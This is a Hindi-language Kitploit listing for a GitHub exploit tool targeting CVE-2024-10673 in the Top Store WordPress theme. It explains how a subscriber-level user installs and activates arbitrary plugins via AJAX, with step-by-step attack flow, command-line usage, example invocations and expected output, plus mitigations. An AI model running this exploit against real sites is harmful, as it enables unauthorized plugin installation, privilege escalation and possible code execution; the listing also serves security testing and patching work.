Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/nxploited/cve-2024-10673
विशेषाधिकार वृद्धिभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंग
GitHubnxploited/cve-2024-10673

CVE-2024-10673

टॉप स्टोर <= 1.5.4 - प्रमाणित (सब्सक्राइबर+) मनमाना प्लगइन इंस्टॉलेशन/एक्टिवेशन

रिपॉजिटरी देखें
111 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

🔥 अवलोकन

यह स्क्रिप्ट CVE-2024-10673 का शोषण करती है, जो Top Store WordPress थीम (<= 1.5.4) में पाई गई एक गंभीर कमजोरी है। यह दोष प्रमाणित उपयोगकर्ताओं को, जिनके पास सब्सक्राइबर-स्तर या उच्च पहुंच है, असुरक्षित AJAX अनुरोधों के माध्यम से मनमाने प्लगइन इंस्टॉल और सक्रिय करने की अनुमति देता है।

⚠️ गंभीरता और प्रभाव

  • अप्रमाणित प्लगइन इंस्टॉलेशन: सब्सक्राइबर विशेषाधिकारों वाले हमलावर बिना व्यवस्थापक अनुमोदन के प्लगइन इंस्टॉल कर सकते हैं।
  • रिमोट कोड एक्ज़ीक्यूशन (RCE) संभावना: यदि कोई दुर्भावनापूर्ण प्लगइन इंस्टॉल होता है, तो हमलावर मनमाना कोड निष्पादित कर सकते हैं।
  • विशेषाधिकार वृद्धि: हमलावर ऐसे प्लगइन इंस्टॉल कर सकते हैं जो उन्हें व्यवस्थापकीय पहुंच प्रदान करते हैं।

🛠️ इस शोषण की विशेषताएं

  • हमले को स्वचालित करता है, आवश्यक nonce को गतिशील रूप से निकालता है।
  • प्लगइन चयन की अनुमति देता है (उपयोगकर्ता यह निर्दिष्ट कर सकते हैं कि कौन सा प्लगइन इंस्टॉल और सक्रिय करना है)।
  • संरचित लॉगिंग के लिए JSON-स्वरूपित प्रतिक्रियाओं का समर्थन करता है।
  • त्रुटियों को सुंदरता से संभालता है, जिससे मजबूत निष्पादन सुनिश्चित होता है।

⚡ शोषण कैसे काम करता है

  1. वर्डप्रेस में लॉगिन करें वैध क्रेडेंशियल का उपयोग करके।
  2. AJAX nonce निकालें themes.php?page=thunk_started से।
  3. प्लगइन इंस्टॉल करने के लिए AJAX अनुरोध भेजें (डिफ़ॉल्ट: hunk-companion या उपयोगकर्ता-परिभाषित प्लगइन)।
  4. प्लगइन सक्रिय करने के लिए दूसरा अनुरोध भेजें।
  5. सफलता या विफलता दर्शाने वाली JSON प्रतिक्रियाएँ आउटपुट करें।

🚀 उपयोग

root@kitploit:~
usage: u.py [-h] -u URL -un USERNAME -p PASSWORD [-pl PLUGIN]

Exploit CVE-2024-10673 - WordPress Plugin Installation & Activation by : # By Nxploit | Khaled Alenazi

options:
  -h, --help            show this help message and exit
  -u URL, --url URL     Target WordPress URL (e.g., http://192.168.100.74:888/wordpress)
  -un USERNAME, --username USERNAME
                        WordPress Username
  -p PASSWORD, --password PASSWORD
                        WordPress Password
  -pl PLUGIN, --plugin PLUGIN
                        Plugin slug to install and activate (default: hunk-companion)

उदाहरण

  • डिफ़ॉल्ट प्लगइन (hunk-companion) इंस्टॉल और सक्रिय करें:
    root@kitploit:~
    python exploit.py -u http://192.168.100.74:888/wordpress -un admin -p admin
    
  • एक विशिष्ट प्लगइन (woocommerce) इंस्टॉल और सक्रिय करें:
    root@kitploit:~
    python CVE-2024-10673.py -u http://192.168.100.74:888/wordpress -un admin -p admin -pl woocommerce
    

📝 अपेक्षित आउटपुट

root@kitploit:~
{"Logged in successfully"}
{"Fetching nonce value..."}
{"Nonce extracted": "abc123"}
{"Installing plugin: woocommerce..."}
{"Plugin woocommerce installed successfully"}
{"Activating plugin: woocommerce..."}
{"Plugin woocommerce activated successfully"}
{"Exploit completed successfully!"}

🔒 शमन

अपनी वर्डप्रेस साइट को सुरक्षित करने के लिए:

  • Top Store थीम के पैच किए गए संस्करण पर अपडेट करें।
  • सब्सक्राइबर अनुमतियों को प्रतिबंधित करें ताकि अनावश्यक पहुँच को रोका जा सके।
  • इंस्टॉल किए गए प्लगइन की निगरानी करें अनधिकृत परिवर्तनों के लिए।
  • गैर-व्यवस्थापकों के लिए प्लगइन इंस्टॉलेशन अक्षम करें।

⚠️ अस्वीकरण

यह स्क्रिप्ट केवल शैक्षिक और सुरक्षा अनुसंधान उद्देश्यों के लिए है। उन प्रणालियों के खिलाफ अनधिकृत उपयोग जिनके आप मालिक नहीं हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट अनुमति नहीं है, अवैध है! जिम्मेदारी से उपयोग करें!

द्वारा: खालिद अल-एनाज़ी (Nxploit)

टूल डाउनलोड करें